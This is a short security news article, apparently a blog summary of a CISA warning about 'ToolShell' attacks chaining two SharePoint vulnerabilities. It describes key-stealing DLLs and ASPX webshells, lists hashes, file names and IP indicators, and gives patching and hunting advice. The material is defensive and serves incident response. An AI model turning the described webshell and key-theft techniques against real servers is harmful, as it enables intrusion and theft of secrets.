CISA warns of active attacks targeting Microsoft SharePoint servers. This attack is called “ToolShell,” could expose business and organizations to further breaches.
In a newly published report, CISA reveals that hackers are combining two critical Microsoft SharePoint vulnerabilities to hijack systems and steal sensitive encryption keys.
Attack Breakdown Of ToolShell Attack:
- Initial Access: Attackers exploit:
- CVE-2025-49706 (authentication bypass)
- CVE-2025-49704 (remote code execution)
to upload malicious files.
- Key Theft: Malicious DLLs (
bjcloiyq.dll,osvmhdfl.dll) extract SharePoint’s cryptographic machine keys. These keys handle data validation and decryption. - Webshell Deployment: Attackers install ASPX backdoors (
spinstall0.aspx,info3.aspx) to execute commands and upload more malware.
Key Threats in the Wild
- Stolen Keys: Sent via HTTP headers (e.g.,
X-TXT-NET). - Webshell Capabilities:
- Execute PowerShell commands (
spinstallb.aspx,spinstallp.aspx) - Upload files
- Bypass authentication using hardcoded passwords
- Execute PowerShell commands (
- System Fingerprinting: Collects drive data, usernames, and OS details.
Critical IOCs
Files (SHA256):
3461da3a2ddcced4a00f87dcd7650af48f97998a3ac9ca649d7ef3b7332bd997 (osvmhdfl.dll)
60a37499f9b02c203af24c2dfd7fdb3834cea707c4c56b410a7e68376938c4b7 (stage3.txt)
92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514 (spinstall0.aspx)
9340bf7378234db5bca0dc5378bf764b6a24bb87a42b05fa21a996340608fbd7 (info3.aspx)
d0c4d6a4be0a65f8ca89e828a3bc810572fff3b3978ff0552a8868c69f83d170 (spinstallp.aspx)
d9c4dd5a8317d1d83b5cc3482e95602f721d58e3ba624d131a9472f927d33b00 (spinstallb.aspx)
675a10e87c248d0f629da864ba8b7fd92b62323c406a69dec35a0e6e1552ecbc (info3.aspx)
bee94b93c1796981a55d7bd27a32345a61304a88ed6cd70a5f7a402f1332df72 (bjcloiyq.dll)IPs
107.191.58.76, 104.238.159.149, 96.9.125.147, 103.186.30.186, 45.77.155.170, 139.144.199.41, 172.174.82.132, 89.46.223.88, 45.77.155.170, 154.223.19.106, 185.197.248.131, 149.40.50.15, 64.176.50.109, 149.28.124.70, 206.166.251.228, 95.179.158.42, 86.48.9.38, 128.199.240.182, 212.125.27.102, 91.132.95.60, 134.199.202.205, 131.226.2.6, 188.130.206.168Immediate Actions
- Patch SharePoint: Prioritize CVE-2025-49704, CVE-2025-49706, and related flaws.
- Scan Systems: Hunt for:
- Files in
/_layouts/15/orTEMPLATELAYOUTS\(e.g.,spinstall*.aspx) - Unusual HTTP headers like
X-TXT-NET
- Files in
- Inspect Authentication Logs: Look for unexpected access to
SignOut.aspxorToolPane.aspx. - Isolate Compromised Systems: If IOCs are found.
The Webshells Are Full Control Panels
One of the files sets up a login form. But it doesn’t check usernames. It uses cookies and base64 hashes. If the hash matches, you’re in.
Once inside, the shell gives the hacker three capabilities:
- Command execution — run Windows commands on the SharePoint server
- File upload — send a file and put it anywhere on the file system
- Credential grabber — steal saved key settings from SharePoint config
It looks like a tool built for ongoing access, not just a quick hit. This tiny installed so[sophisticated webshell will give the attackers access from anywhere.
Who’s Doing This?
CISA didn’t name names. But they mention some threat actor groups in passing — Linen Typhoon, Violet Typhoon, and Storm-2603.
Those names have come up before. They’re known for targeting U.S. infrastructure.
Some of the IP addresses used in the attacks are tied to VPN services and cloud hosts. So it’s hard to say where they’re really from. But it’s clear this is not some low-level hack.
What You Should Do Right Now
If your org uses SharePoint (especially on-prem):
- Patch immediately. Microsoft’s advisory is out.
- Scan your web directories. Look for suspicious
.aspxfiles. - Check logs. Review traffic to
/layouts/andToolPane.aspx. - Watch for PowerShell usage. Especially base64 and encoded scripts.
- Apply the Sigma and YARA rules. They catch known patterns.
